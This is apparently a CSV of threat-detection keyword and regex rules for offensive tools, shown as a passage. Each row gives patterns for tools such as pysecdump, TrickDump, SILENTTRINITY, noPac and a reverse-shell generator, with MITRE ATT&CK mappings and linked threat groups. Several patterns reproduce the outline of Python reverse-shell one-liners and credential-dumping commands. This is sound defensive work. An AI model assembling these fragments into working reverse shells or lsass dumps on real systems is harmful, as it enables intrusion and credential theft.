"*pyrit -e * create_essid*",".{0,1000}pyrit\s\-e\s.{0,1000}\screate_essid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56025"
"*pyrit -i *.txt import_passwords*",".{0,1000}pyrit\s\-i\s.{0,1000}\.txt\simport_passwords.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56026"
"*pyrit -r *.pcap attack_db*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\sattack_db.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56027"
"*pyrit -r *.pcap -b * -i *.txt attack_passthrough*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\s\-b\s.{0,1000}\s\-i\s.{0,1000}\.txt\sattack_passthrough.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56028"
"*PyroTek3/PowerShell-AD-Recon*",".{0,1000}PyroTek3\/PowerShell\-AD\-Recon.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","56029"
"*pysecdump -*",".{0,1000}pysecdump\s\-.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56030"
"*pysecdump v%s *",".{0,1000}pysecdump\sv\%s\s.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56031"
"*pysecdump.exe*",".{0,1000}pysecdump\.exe.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56032"
"*pysecdump.py*",".{0,1000}pysecdump\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56033"
"*pysecdump: Starting shell*",".{0,1000}pysecdump\:\sStarting\sshell.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56034"
"*pysnaffler -*",".{0,1000}pysnaffler\s\-.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56038"
"*pysnaffler 'smb2+kerberos+password:*",".{0,1000}pysnaffler\s\'smb2\+kerberos\+password\:.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56039"
"*pysnaffler 'smb2+ntlm-nt://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-nt\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56040"
"*pysnaffler 'smb2+ntlm-password://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-password\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56041"
"*pysnaffler.whatif:main*",".{0,1000}pysnaffler\.whatif\:main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56042"
"*pysnaffler/_version.py*",".{0,1000}pysnaffler\/_version\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56043"
"*pysnaffler-main*",".{0,1000}pysnaffler\-main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56044"
"*pysoserial.py*",".{0,1000}pysoserial\.py.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","56045"
"*Pysoserial-main*",".{0,1000}Pysoserial\-main.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","56046"
"*pysoxy-master*",".{0,1000}pysoxy\-master.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","56047"
"*PySplunkWhisperer2*",".{0,1000}PySplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","56048"
"*pysqlrecon.db*",".{0,1000}pysqlrecon\.db.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56049"
"*pysqlrecon.lib*",".{0,1000}pysqlrecon\.lib.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56050"
"*pysqlrecon.logger*",".{0,1000}pysqlrecon\.logger.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56051"
"*pystinger_for_darkshadow*",".{0,1000}pystinger_for_darkshadow.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","56052"
"*python 3 st teamserver *",".{0,1000}python\s3\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56053"
"*python argus.py*",".{0,1000}python\sargus\.py.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","N/A","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","56054"
"*python barrel.go -o debugproc*",".{0,1000}python\sbarrel\.go\s\-o\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56055"
"*python barrel.py -o debugproc*",".{0,1000}python\sbarrel\.py\s\-o\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56056"
"*python -c ""import fetch""*",".{0,1000}python\s\-c\s\""import\sfetch\"".{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","56057"
"*python -c*'import socket,subprocess,os'*socket.socket(socket.AF_INET*connect((""*))*dup2*pty.spawn(""sh"")'*",".{0,1000}python\s\-c.{0,1000}\'import\ssocket,subprocess,os\'.{0,1000}socket\.socket\(socket\.AF_INET.{0,1000}connect\(\(\"".{0,1000}\)\).{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\)\'.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56059"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56060"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56061"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56062"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""cmd"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""cmd\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56063"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""powershell"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""powershell\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56064"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""pwsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""pwsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56065"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56066"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""zsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""zsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56067"
"*python create_dump.py *",".{0,1000}python\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56068"
"*python dkmc.py*",".{0,1000}python\sdkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","56069"
"*python kraken.py -*",".{0,1000}python\skraken\.py\s\-.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","56070"
"*python lock.py -o disk*",".{0,1000}python\slock\.py\s\-o\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56071"
"*python -m orbitaldump *",".{0,1000}python\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","56073"
"*python -m peas -u *",".{0,1000}python\s\-m\speas\s\-u\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","56074"
"*python -m rarce *",".{0,1000}python\s\-m\srarce\s.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56075"
"*python -m venv ADcheck*",".{0,1000}python\s\-m\svenv\sADcheck.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","56077"
"*python main.py --KEY=* --URL=*127.0.0.1*",".{0,1000}python\smain\.py\s\-\-KEY\=.{0,1000}\s\-\-URL\=.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","56078"
"*python noPac.*",".{0,1000}python\snoPac\..{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","56079"
"*python raiseChild.py -*",".{0,1000}python\sraiseChild\.py\s\-.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56080"
"*python reuse.py --start --rhost * --rport *",".{0,1000}python\sreuse\.py\s\-\-start\s\-\-rhost\s.{0,1000}\s\-\-rport\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","56081"
"*python reverse_http.py*",".{0,1000}python\sreverse_http\.py.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","56082"
"*python rsf.py*",".{0,1000}python\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56083"
"*python scshell*",".{0,1000}python\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 